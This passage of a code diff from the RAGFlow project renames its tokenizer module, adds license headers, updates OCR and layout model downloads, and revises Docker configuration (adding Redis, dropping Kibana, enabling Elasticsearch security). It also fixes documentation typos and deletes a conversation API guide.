                                   chars[j]["width"]) / 2:
                    chars[j]["text"] += " "
                j += 1
            # if i > 0:
            #     if not chars:
            #         self.page_cum_height.append(img.size[1] / zoomin)
            #     else:
            #         self.page_cum_height.append(
            #             np.max([c["bottom"] for c in chars]))

            self.__ocr(i + 1, img, chars, zoomin)
            if callback:
            if callback and i % 6 == 5:
                callback(prog=(i + 1) * 0.6 / len(self.page_images), msg="")
        # print("OCR:", timer()-st)

        if not self.is_english and not any(
                [c for c in self.page_chars]) and self.boxes:
@@ -1021,6 +1021,8 @@ class HuParser:

        self.page_cum_height = np.cumsum(self.page_cum_height)
        assert len(self.page_cum_height) == len(self.page_images) + 1
        if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
                                                                page_to, callback)

    def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
        self.__images__(fnm, zoomin)

@@ -10,11 +10,12 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#

from io import BytesIO
from pptx import Presentation


class HuPptParser(object):
class RAGFlowPptParser(object):
    def __init__(self):
        super().__init__()

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import datetime

@@ -1,6 +1,19 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import re,json,os
import pandas as pd
from rag.nlp import huqie
from rag.nlp import rag_tokenizer
from . import regions
current_file_path = os.path.dirname(os.path.abspath(__file__))
GOODS = pd.read_csv(os.path.join(current_file_path, "res/corp_baike_len.csv"), sep="\t", header=0).fillna(0)
@@ -22,14 +35,14 @@ def baike(cid, default_v=0):
def corpNorm(nm, add_region=True):
    global CORP_TKS
    if not nm or type(nm)!=type(""):return ""
    nm = huqie.tradi2simp(huqie.strQ2B(nm)).lower()
    nm = rag_tokenizer.tradi2simp(rag_tokenizer.strQ2B(nm)).lower()
    nm = re.sub(r"&amp;", "&", nm)
    nm = re.sub(r"[\(\)()\+'\"\t \*\\【】-]+", " ", nm)
    nm = re.sub(r"([—-]+.*| +co\..*|corp\..*| +inc\..*| +ltd.*)", "", nm, 10000, re.IGNORECASE)
    nm = re.sub(r"(计算机|技术|(技术|科技|网络)*有限公司|公司|有限|研发中心|中国|总部)$", "", nm, 10000, re.IGNORECASE)
    if not nm or (len(nm)<5 and not regions.isName(nm[0:2])):return nm

    tks = huqie.qie(nm).split(" ")
    tks = rag_tokenizer.tokenize(nm).split(" ")
    reg = [t for i,t in enumerate(tks) if regions.isName(t) and (t != "中国" or i > 0)]
    nm = ""
    for t in tks:

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {"94":"EMBA",
       "6":"MBA",
       "95":"MPA",

@@ -1,3 +1,15 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {"1":{"name":"IT/通信/电子","parent":"0"},
       "2":{"name":"互联网","parent":"0"},

@@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

TBL = {
    "2":{"name":"北京","parent":"1"},
    "3":{"name":"天津","parent":"1"},

@@ -1,4 +1,16 @@
# -*- coding: UTF-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os, json,re,copy
import pandas as pd
current_file_path = os.path.dirname(os.path.abspath(__file__))

@@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import json
from deepdoc.parser.resume.entities import degrees, regions, industries


@@ -1,9 +1,21 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import re, copy, time, datetime, demjson3, \
    traceback, signal
import numpy as np
from deepdoc.parser.resume.entities import degrees, schools, corporations
from rag.nlp import huqie, surname
from rag.nlp import rag_tokenizer, surname
from xpinyin import Pinyin
from contextlib import contextmanager

@@ -83,7 +95,7 @@ def forEdu(cv):
        if n.get("school_name") and isinstance(n["school_name"], str):
            sch.append(re.sub(r"(211|985|重点大学|[,&;;-])", "", n["school_name"]))
            e["sch_nm_kwd"] = sch[-1]
            fea.append(huqie.qieqie(huqie.qie(n.get("school_name", ""))).split(" ")[-1])
            fea.append(rag_tokenizer.fine_grained_tokenize(rag_tokenizer.tokenize(n.get("school_name", ""))).split(" ")[-1])

        if n.get("discipline_name") and isinstance(n["discipline_name"], str):
            maj.append(n["discipline_name"])
@@ -166,10 +178,10 @@ def forEdu(cv):
        if "tag_kwd" not in cv: cv["tag_kwd"] = []
        if "好学历" not in cv["tag_kwd"]: cv["tag_kwd"].append("好学历")

    if cv.get("major_kwd"): cv["major_tks"] = huqie.qie(" ".join(maj))
    if cv.get("school_name_kwd"): cv["school_name_tks"] = huqie.qie(" ".join(sch))
    if cv.get("first_school_name_kwd"): cv["first_school_name_tks"] = huqie.qie(" ".join(fsch))
    if cv.get("first_major_kwd"): cv["first_major_tks"] = huqie.qie(" ".join(fmaj))
    if cv.get("major_kwd"): cv["major_tks"] = rag_tokenizer.tokenize(" ".join(maj))
    if cv.get("school_name_kwd"): cv["school_name_tks"] = rag_tokenizer.tokenize(" ".join(sch))
    if cv.get("first_school_name_kwd"): cv["first_school_name_tks"] = rag_tokenizer.tokenize(" ".join(fsch))
    if cv.get("first_major_kwd"): cv["first_major_tks"] = rag_tokenizer.tokenize(" ".join(fmaj))

    return cv

@@ -187,11 +199,11 @@ def forProj(cv):
        if n.get("achivement"): desc.append(str(n["achivement"]))

    if pro_nms:
        # cv["pro_nms_tks"] = huqie.qie(" ".join(pro_nms))
        cv["project_name_tks"] = huqie.qie(pro_nms[0])
        # cv["pro_nms_tks"] = rag_tokenizer.tokenize(" ".join(pro_nms))
        cv["project_name_tks"] = rag_tokenizer.tokenize(pro_nms[0])
    if desc:
        cv["pro_desc_ltks"] = huqie.qie(rmHtmlTag(" ".join(desc)))
        cv["project_desc_ltks"] = huqie.qie(rmHtmlTag(desc[0]))
        cv["pro_desc_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(" ".join(desc)))
        cv["project_desc_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(desc[0]))

    return cv

@@ -280,25 +292,25 @@ def forWork(cv):
    if fea["corporation_id"]: cv["corporation_id"] = fea["corporation_id"]

    if fea["position_name"]:
        cv["position_name_tks"] = huqie.qie(fea["position_name"][0])
        cv["position_name_sm_tks"] = huqie.qieqie(cv["position_name_tks"])
        cv["pos_nm_tks"] = huqie.qie(" ".join(fea["position_name"][1:]))
        cv["position_name_tks"] = rag_tokenizer.tokenize(fea["position_name"][0])
        cv["position_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["position_name_tks"])
        cv["pos_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["position_name"][1:]))

    if fea["industry_name"]:
        cv["industry_name_tks"] = huqie.qie(fea["industry_name"][0])
        cv["industry_name_sm_tks"] = huqie.qieqie(cv["industry_name_tks"])
        cv["indu_nm_tks"] = huqie.qie(" ".join(fea["industry_name"][1:]))
        cv["industry_name_tks"] = rag_tokenizer.tokenize(fea["industry_name"][0])
        cv["industry_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["industry_name_tks"])
        cv["indu_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["industry_name"][1:]))

    if fea["corporation_name"]:
        cv["corporation_name_kwd"] = fea["corporation_name"][0]
        cv["corp_nm_kwd"] = fea["corporation_name"]
        cv["corporation_name_tks"] = huqie.qie(fea["corporation_name"][0])
        cv["corporation_name_sm_tks"] = huqie.qieqie(cv["corporation_name_tks"])
        cv["corp_nm_tks"] = huqie.qie(" ".join(fea["corporation_name"][1:]))
        cv["corporation_name_tks"] = rag_tokenizer.tokenize(fea["corporation_name"][0])
        cv["corporation_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["corporation_name_tks"])
        cv["corp_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["corporation_name"][1:]))

    if fea["responsibilities"]:
        cv["responsibilities_ltks"] = huqie.qie(fea["responsibilities"][0])
        cv["resp_ltks"] = huqie.qie(" ".join(fea["responsibilities"][1:]))
        cv["responsibilities_ltks"] = rag_tokenizer.tokenize(fea["responsibilities"][0])
        cv["resp_ltks"] = rag_tokenizer.tokenize(" ".join(fea["responsibilities"][1:]))

    if fea["subordinates_count"]: fea["subordinates_count"] = [int(i) for i in fea["subordinates_count"] if
                                                               re.match(r"[^0-9]+$", str(i))]
@@ -444,15 +456,15 @@ def parse(cv):
                if nms:
                    t = k[:-4]
                    cv[f"{t}_kwd"] = nms
                    cv[f"{t}_tks"] = huqie.qie(" ".join(nms))
                    cv[f"{t}_tks"] = rag_tokenizer.tokenize(" ".join(nms))
            except Exception as e:
                print("【EXCEPTION】:", str(traceback.format_exc()), cv[k])
                cv[k] = []

        # tokenize fields
        if k in tks_fld:
            cv[f"{k}_tks"] = huqie.qie(cv[k])
            if k in small_tks_fld: cv[f"{k}_sm_tks"] = huqie.qie(cv[f"{k}_tks"])
            cv[f"{k}_tks"] = rag_tokenizer.tokenize(cv[k])
            if k in small_tks_fld: cv[f"{k}_sm_tks"] = rag_tokenizer.tokenize(cv[f"{k}_tks"])

        # keyword fields
        if k in kwd_fld: cv[f"{k}_kwd"] = [n.lower()
@@ -492,7 +504,7 @@ def parse(cv):
        cv["name_kwd"] = name
        cv["name_pinyin_kwd"] = PY.get_pinyins(nm[:20], ' ')[:3]
        cv["name_tks"] = (
            huqie.qie(name) + " " + (" ".join(list(name)) if not re.match(r"[a-zA-Z ]+$", name) else "")
            rag_tokenizer.tokenize(name) + " " + (" ".join(list(name)) if not re.match(r"[a-zA-Z ]+$", name) else "")
        ) if name else ""
    else:
        cv["integerity_flt"] /= 2.
@@ -515,7 +527,7 @@ def parse(cv):
        cv["updated_at_dt"] = f"%s-%02d-%02d 00:00:00" % (y, int(m), int(d))
    # long text tokenize

    if cv.get("responsibilities"): cv["responsibilities_ltks"] = huqie.qie(rmHtmlTag(cv["responsibilities"]))
    if cv.get("responsibilities"): cv["responsibilities_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(cv["responsibilities"]))

    # for yes or no field
    fea = []

@@ -1,12 +1,26 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import pdfplumber

from .ocr import OCR
from .recognizer import Recognizer
from .layout_recognizer import LayoutRecognizer
from .table_structure_recognizer import TableStructureRecognizer


def init_in_out(args):
    from PIL import Image
    import fitz
    import os
    import traceback
    from api.utils.file_utils import traversal_files
@@ -18,13 +32,11 @@ def init_in_out(args):

    def pdf_pages(fnm, zoomin=3):
        nonlocal outputs, images
        pdf = fitz.open(fnm)
        mat = fitz.Matrix(zoomin, zoomin)
        for i, page in enumerate(pdf):
            pix = page.get_pixmap(matrix=mat)
            img = Image.frombytes("RGB", [pix.width, pix.height],
                                  pix.samples)
            images.append(img)
        pdf = pdfplumber.open(fnm)
        images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
                  enumerate(pdf.pages)]

        for i, page in enumerate(images):
            outputs.append(os.path.split(fnm)[-1] + f"_{i}.jpg")

    def images_and_outputs(fnm):

@@ -43,7 +43,9 @@ class LayoutRecognizer(Recognizer):
                                     "rag/res/deepdoc")
            super().__init__(self.labels, domain, model_dir)
        except Exception as e:
            model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
            model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
                                          local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
                                          local_dir_use_symlinks=False)
            super().__init__(self.labels, domain, model_dir)

        self.garbage_layouts = ["footer", "header", "reference"]

@@ -486,7 +486,9 @@ class OCR(object):
            self.text_detector = TextDetector(model_dir)
            self.text_recognizer = TextRecognizer(model_dir)
        except Exception as e:
            model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
            model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
                                          local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
                                          local_dir_use_symlinks=False)
            self.text_detector = TextDetector(model_dir)
            self.text_recognizer = TextRecognizer(model_dir)


@@ -1,5 +1,18 @@
import copy
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import copy
import re
import numpy as np
import cv2
from shapely.geometry import Polygon

@@ -41,7 +41,9 @@ class Recognizer(object):
                "rag/res/deepdoc")
            model_file_path = os.path.join(model_dir, task_name + ".onnx")
            if not os.path.exists(model_file_path):
                model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
                model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
                                              local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
                                              local_dir_use_symlinks=False)
                model_file_path = os.path.join(model_dir, task_name + ".onnx")
        else:
            model_file_path = os.path.join(model_dir, task_name + ".onnx")

@@ -11,10 +11,6 @@
# limitations under the License.
#

from deepdoc.vision.seeit import draw_box
from deepdoc.vision import OCR, init_in_out
import argparse
import numpy as np
import os
import sys
sys.path.insert(
@@ -25,6 +21,11 @@ sys.path.insert(
        os.path.abspath(__file__)),
    '../../')))

from deepdoc.vision.seeit import draw_box
from deepdoc.vision import OCR, init_in_out
import argparse
import numpy as np


def main(args):
    ocr = OCR()

@@ -10,17 +10,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#

from deepdoc.vision.seeit import draw_box
from deepdoc.vision import Recognizer, LayoutRecognizer, TableStructureRecognizer, OCR, init_in_out
from api.utils.file_utils import get_project_base_directory
import argparse
import os
import sys
import re

import numpy as np

import os, sys
sys.path.insert(
    0,
    os.path.abspath(
@@ -29,6 +19,13 @@ sys.path.insert(
        os.path.abspath(__file__)),
    '../../')))

from deepdoc.vision.seeit import draw_box
from deepdoc.vision import Recognizer, LayoutRecognizer, TableStructureRecognizer, OCR, init_in_out
from api.utils.file_utils import get_project_base_directory
import argparse
import re
import numpy as np


def main(args):
    images, outputs = init_in_out(args)

@@ -19,7 +19,7 @@ import numpy as np
from huggingface_hub import snapshot_download

from api.utils.file_utils import get_project_base_directory
from rag.nlp import huqie
from rag.nlp import rag_tokenizer
from .recognizer import Recognizer


@@ -39,7 +39,9 @@ class TableStructureRecognizer(Recognizer):
                    get_project_base_directory(),
                    "rag/res/deepdoc"))
        except Exception as e:
            super().__init__(self.labels, "tsr", snapshot_download(repo_id="InfiniFlow/deepdoc"))
            super().__init__(self.labels, "tsr", snapshot_download(repo_id="InfiniFlow/deepdoc",
                                                                   local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
                                                                   local_dir_use_symlinks=False))

    def __call__(self, images, thr=0.2):
        tbls = super().__call__(images, thr)
@@ -115,14 +117,14 @@ class TableStructureRecognizer(Recognizer):
        for p, n in patt:
            if re.search(p, b["text"].strip()):
                return n
        tks = [t for t in huqie.qie(b["text"]).split(" ") if len(t) > 1]
        tks = [t for t in rag_tokenizer.tokenize(b["text"]).split(" ") if len(t) > 1]
        if len(tks) > 3:
            if len(tks) < 12:
                return "Tx"
            else:
                return "Lx"

        if len(tks) == 1 and huqie.tag(tks[0]) == "nr":
        if len(tks) == 1 and rag_tokenizer.tag(tks[0]) == "nr":
            return "Nr"

        return "Ot"

docker/.env
@@ -1,26 +1,38 @@
# Version of Elastic products
STACK_VERSION=8.11.3

# Set the cluster name
CLUSTER_NAME=rag_flow

# Port to expose Elasticsearch HTTP API to the host
ES_PORT=1200

# Set the Elasticsearch password
ELASTIC_PASSWORD=infini_rag_flow

# Port to expose Kibana to the host
KIBANA_PORT=6601

# Increase or decrease based on the available host memory (in bytes)
MEM_LIMIT=4073741824
MEM_LIMIT=8073741824

MYSQL_PASSWORD=infini_rag_flow
MYSQL_PORT=5455

# Port to expose minio to the host
MINIO_CONSOLE_PORT=9001
MINIO_PORT=9000

MINIO_USER=rag_flow
MINIO_PASSWORD=infini_rag_flow

REDIS_PORT=6379
REDIS_PASSWORD=infini_rag_flow

SVR_HTTP_PORT=9380

RAGFLOW_VERSION=dev

TIMEZONE='Asia/Shanghai'

######## OS setup for ES ###########

@@ -50,7 +50,7 @@ The serving port of mysql inside the container. The modification should be synch
The max database connection.

### stale_timeout
The timeout duation in seconds.
The timeout duration in seconds.

## minio

@@ -67,7 +67,7 @@ The serving IP and port inside the docker container. This is not updating until
Newly signed-up users use the LLM configured by this part. Otherwise, users need to configure their own LLM in *setting*.

### factory
The LLM suppliers. 'Tongyi-Qianwen', "OpenAI", "Moonshot" and "ZHIPU-AI" are supported.
The LLM suppliers. "OpenAI", "Tongyi-Qianwen", "ZHIPU-AI", "Moonshot", "DeepSeek", "Baichuan", and "VolcEngine" are supported.

### api_key
The corresponding API key of your assigned LLM vendor.

docker/docker-compose-CN-oc9.yml
Normal file
@@ -0,0 +1,30 @@
include:
  - path: ./docker-compose-base.yml
    env_file: ./.env

services:
  ragflow:
    depends_on:
      mysql:
        condition: service_healthy
      es01:
        condition: service_healthy
    image: edwardelric233/ragflow:oc9
    container_name: ragflow-server
    ports:
      - ${SVR_HTTP_PORT}:9380
      - 80:80
      - 443:443
    volumes:
      - ./service_conf.yaml:/ragflow/conf/service_conf.yaml
      - ./ragflow-logs:/ragflow/logs
      - ./nginx/ragflow.conf:/etc/nginx/conf.d/ragflow.conf
      - ./nginx/proxy.conf:/etc/nginx/proxy.conf
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://hf-mirror.com
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always
@@ -9,7 +9,7 @@ services:
        condition: service_healthy
      es01:
        condition: service_healthy
    image: swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow:v0.2.0
    image: swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow:${RAGFLOW_VERSION}
    container_name: ragflow-server
    ports:
      - ${SVR_HTTP_PORT}:9380
@@ -24,6 +24,7 @@ services:
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://hf-mirror.com
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always

@@ -8,12 +8,12 @@ services:
      - ${ES_PORT}:9200
    environment:
      - node.name=es01
      - cluster.name=${CLUSTER_NAME}
      - cluster.initial_master_nodes=es01
      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD}
      - bootstrap.memory_lock=false
      - xpack.security.enabled=false
      - cluster.max_shards_per_node=4096
      - discovery.type=single-node
      - xpack.security.enabled=true
      - xpack.security.http.ssl.enabled=false
      - xpack.security.transport.ssl.enabled=false
      - TZ=${TIMEZONE}
    mem_limit: ${MEM_LIMIT}
    ulimits:
@@ -29,24 +29,6 @@ services:
      - ragflow
    restart: always

  kibana:
    depends_on:
      es01:
        condition: service_healthy
    image: docker.elastic.co/kibana/kibana:${STACK_VERSION}
    container_name: ragflow-kibana
    volumes:
      - kibanadata:/usr/share/kibana/data
    ports:
      - ${KIBANA_PORT}:5601
    environment:
      - SERVERNAME=kibana
      - ELASTICSEARCH_HOSTS=http://es01:9200
      - TZ=${TIMEZONE}
    mem_limit: ${MEM_LIMIT}
    networks:
      - ragflow

  mysql:
    image: mysql:5.7.18
    container_name: ragflow-mysql
@@ -74,14 +56,13 @@ services:
        retries: 3
    restart: always


  minio:
    image: quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z
    container_name: ragflow-minio
    command: server --console-address ":9001" /data
    ports:
      - 9000:9000
      - 9001:9001
      - ${MINIO_PORT}:9000
      - ${MINIO_CONSOLE_PORT}:9001
    environment:
      - MINIO_ROOT_USER=${MINIO_USER}
      - MINIO_ROOT_PASSWORD=${MINIO_PASSWORD}
@@ -92,16 +73,29 @@ services:
      - ragflow
    restart: always

  redis:
    image: redis:7.2.4
    container_name: ragflow-redis
    command: redis-server --requirepass ${REDIS_PASSWORD} --maxmemory 128mb --maxmemory-policy allkeys-lru
    ports:
      - ${REDIS_PORT}:6379
    volumes:
      - redis_data:/data
    networks:
      - ragflow
    restart: always



volumes:
  esdata01:
    driver: local
  kibanadata:
    driver: local
  mysql_data:
    driver: local
  minio_data:
    driver: local
  redis_data:
    driver: local

networks:
  ragflow:

@@ -9,7 +9,7 @@ services:
        condition: service_healthy
      es01:
        condition: service_healthy
    image: infiniflow/ragflow:v0.2.0
    image: infiniflow/ragflow:${RAGFLOW_VERSION}
    container_name: ragflow-server
    ports:
      - ${SVR_HTTP_PORT}:9380
@@ -24,6 +24,7 @@ services:
    environment:
      - TZ=${TIMEZONE}
      - HF_ENDPOINT=https://huggingface.co
      - MACOS=${MACOS}
    networks:
      - ragflow
    restart: always

@@ -4,37 +4,24 @@

export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu/

PY=/root/miniconda3/envs/py11/bin/python
PY=python3
if [[ -z "$WS" || $WS -lt 1 ]]; then
  WS=1
fi

function task_exe(){
    while [ 1 -eq 1 ];do
      $PY rag/svr/task_executor.py $1 $2;
      $PY rag/svr/task_executor.py ;
    done
}

function watch_broker(){
    while [ 1 -eq 1 ];do
      C=`ps aux|grep "task_broker.py"|grep -v grep|wc -l`;
      if [ $C -lt 1 ];then
          $PY rag/svr/task_broker.py &
      fi
      sleep 5;
    done
}

function task_bro(){
    sleep 160;
    watch_broker;
}

task_bro &

WS=2
for ((i=0;i<WS;i++))
do
  task_exe $i $WS &
  task_exe &
done

$PY api/ragflow_server.py
while [ 1 -eq 1 ];do
    $PY api/ragflow_server.py
done

wait;
@@ -15,6 +15,12 @@ minio:
  host: 'minio:9000'
es:
  hosts: 'http://es01:9200'
  username: 'elastic'
  password: 'infini_rag_flow'
redis:
  db: 1
  password: 'infini_rag_flow'
  host: 'redis:6379'
user_default_llm:
  factory: 'Tongyi-Qianwen'
  api_key: 'sk-xxxxxxxxxxxxx'

docs/_category_.json
Normal file
@@ -0,0 +1,8 @@
{
  "label": "Get Started",
  "position": 1,
  "link": {
    "type": "generated-index",
    "description": "RAGFlow Quick Start"
  }
}

@@ -1,303 +0,0 @@
# Conversation API Instruction

## Base URL
```buildoutcfg
https://demo.ragflow.io/v1/
```

## Authorization

All the APIs are authorized with an API key. Please keep it safe and private. Don't reveal it in any way from the front end.
The API key should be put in the header of the request:
```buildoutcfg
Authorization: Bearer {API_KEY}
```

## Start a conversation

This should be called whenever a new user comes to chat.
### Path: /api/new_conversation
### Method: GET
### Parameter:

| name | type | optional | description|
|------|-------|----|----|
| user_id| string | No | It's for identifying the user in order to search and calculate statistics.|

### Response
```json
{
    "data": {
        "create_date": "Fri, 12 Apr 2024 17:26:21 GMT",
        "create_time": 1712913981857,
        "dialog_id": "4f0a2e4cb9af11ee9ba20aef05f5e94f",
        "duration": 0.0,
        "id": "b9b2e098f8ae11ee9f45fa163e197198",
        "message": [
            {
                "content": "Hi, I'm your assistant, can I help you?",
                "role": "assistant"
            }
        ],
        "reference": [],
        "tokens": 0,
        "update_date": "Fri, 12 Apr 2024 17:26:21 GMT",
        "update_time": 1712913981857,
        "user_id": "kevinhu"
    },
    "retcode": 0,
    "retmsg": "success"
}
```
> data['id'] in the response should be stored and will be used in every round of the following conversation.
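Putting the base URL, header, and parameter together, a minimal Python client call for this endpoint (the API key value is a placeholder):

```python
import requests

BASE = "https://demo.ragflow.io/v1"
API_KEY = "<your-api-key>"  # placeholder; use the key issued to you

resp = requests.get(
    f"{BASE}/api/new_conversation",
    params={"user_id": "kevinhu"},
    headers={"Authorization": f"Bearer {API_KEY}"},
)
conversation_id = resp.json()["data"]["id"]  # reuse in every following round
```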

## Get history of a conversation

### Path: /api/conversation/\<id\>
### Method: GET
### Response
```json
{
    "data": {
        "create_date": "Mon, 01 Apr 2024 09:28:42 GMT",
        "create_time": 1711934922220,
        "dialog_id": "df4a4916d7bd11eeaa650242ac180006",
        "id": "2cae30fcefc711ee94140242ac180006",
        "message": [
            {
                "content": "Hi! I'm your assistant, what can I do for you?",
                "role": "assistant"
            },
            {
                "content": "What's the vit score for GPT-4?",
                "role": "user"
            },
            {
                "content": "The ViT Score for GPT-4 in the zero-shot scenario is 0.5058, and in the few-shot scenario, it is 0.6480. ##0$$",
                "role": "assistant"
            },
            {
                "content": "How is the nvlink topology like?",
                "role": "user"
            },
            {
                "content": "NVLink topology refers to the arrangement of connections between GPUs using NVIDIA's NVLink technology. Correct NVLink topology for NVIDIA A100 cards involves connecting one GPU to another through a series of NVLink bridges ##0$$. Each of the three attached bridges spans two PCIe slots, and for optimal performance and balanced bridge topology, all three NVLink bridges should be used when connecting two adjacent A100 cards.\n\nHere's a summary of the correct and incorrect topologies:\n\n- **Correct**: Both GPUs are connected via all three NVLink bridges, ensuring full bandwidth and proper communication.\n- **Incorrect**: Not using all three bridges or having an uneven connection configuration would result in suboptimal performance.\n\nIt's also important to note that for multi-CPU systems, both A100 cards in a bridged pair should be within the same CPU domain, unless each CPU has a single A100 PCIe card, in which case they can be bridged together.",
                "role": "assistant"
            }
        ],
        "user_id": "user name",
        "reference": [
            {
                "chunks": [
                    {
                        "chunk_id": "d0bc7892c3ec4aeac071544fd56730a8",
                        "content_ltks": "tabl 1:openagi task-solv perform under differ set for three closed-sourc llm . boldfac denot the highest score under each learn schema . metric gpt-3.5-turbo claude-2 gpt-4 zero few zero few zero few clip score 0.0 0.0 0.0 0.2543 0.0 0.3055 bert score 0.1914 0.3820 0.2111 0.5038 0.2076 0.6307 vit score 0.2437 0.7497 0.4082 0.5416 0.5058 0.6480 overal 0.1450 0.3772 0.2064 0.4332 0.2378 0.5281",
                        "content_with_weight": "<table><caption>Table 1: OpenAGI task-solving performances under different settings for three closed-source LLMs. Boldface denotes the highest score under each learning schema.</caption>\n<tr><th rowspan=2 >Metrics</th><th >GPT-3.5-turbo</th><th></th><th >Claude-2</th><th >GPT-4</th></tr>\n<tr><th >Zero</th><th >Few</th><th >Zero Few</th><th >Zero Few</th></tr>\n<tr><td >CLIP Score</td><td >0.0</td><td >0.0</td><td >0.0 0.2543</td><td >0.0 0.3055</td></tr>\n<tr><td >BERT Score</td><td >0.1914</td><td >0.3820</td><td >0.2111 0.5038</td><td >0.2076 0.6307</td></tr>\n<tr><td >ViT Score</td><td >0.2437</td><td >0.7497</td><td >0.4082 0.5416</td><td >0.5058 0.6480</td></tr>\n<tr><td >Overall</td><td >0.1450</td><td >0.3772</td><td >0.2064 0.4332</td><td >0.2378 0.5281</td></tr>\n</table>",
                        "doc_id": "c790da40ea8911ee928e0242ac180005",
                        "docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
                        "img_id": "afab9fdad6e511eebdb20242ac180006-d0bc7892c3ec4aeac071544fd56730a8",
